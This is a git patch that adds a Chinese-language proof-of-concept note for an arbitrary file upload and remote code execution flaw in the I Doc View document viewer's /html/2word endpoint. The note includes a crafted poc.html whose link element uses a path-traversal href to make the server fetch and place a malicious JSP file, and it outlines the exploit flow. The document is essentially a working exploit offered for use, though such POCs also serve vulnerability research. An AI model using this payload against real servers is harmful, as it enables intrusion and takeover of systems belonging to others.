From 40198f47583380c7235bd531be0ba5795d1b3ebf Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Thu, 23 Nov 2023 20:50:15 +0800
Subject: [PATCH] =?UTF-8?q?Create=20I=20Doc=20View=E4=BB=BB=E6=84=8F?=
 =?UTF-8?q?=E6=96=87=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 I Doc View任意文件上传漏洞.md | 29 +++++++++++++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 I Doc View任意文件上传漏洞.md

diff --git a/I Doc View任意文件上传漏洞.md b/I Doc View任意文件上传漏洞.md
new file mode 100644
index 0000000..15e7951
--- /dev/null
+++ b/I Doc View任意文件上传漏洞.md	
@@ -0,0 +1,29 @@
+
+## I Doc View任意文件上传漏洞
+I DOC VIEW是一个在线的文档查看器，其中的/html/2word接口因为处理不当，导致可以远程读取任意文件，通过这个接口导致服务器下载恶意的JSP进行解析，从而RCE。
+
+## POC构造
+流程：携带恶意link[href]的html -> 远程获取  -> 解析出href -> 远程获取恶意文件
+
+poc.html
+```html
+
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <title>test</title>  
+</head>
+<body>
+  <link href="/..\..\..\docview\poc.jsp">
+</body>
+</html>
+```
+然后构造 `..\..\..\docview\poc.jsp`  这个是文件
+![image](https://github.com/wy876/POC/assets/139549762/736f7c0a-4f06-4170-805a-cf1580b69de3)
+
+![image](https://github.com/wy876/POC/assets/139549762/73ab1c2a-ad91-40a3-96b0-0ca978fa9abe)
+
+## 漏洞分析
+```
+https://mp.weixin.qq.com/s/lDqhDnZGXoRyp2IolQ2odg
+```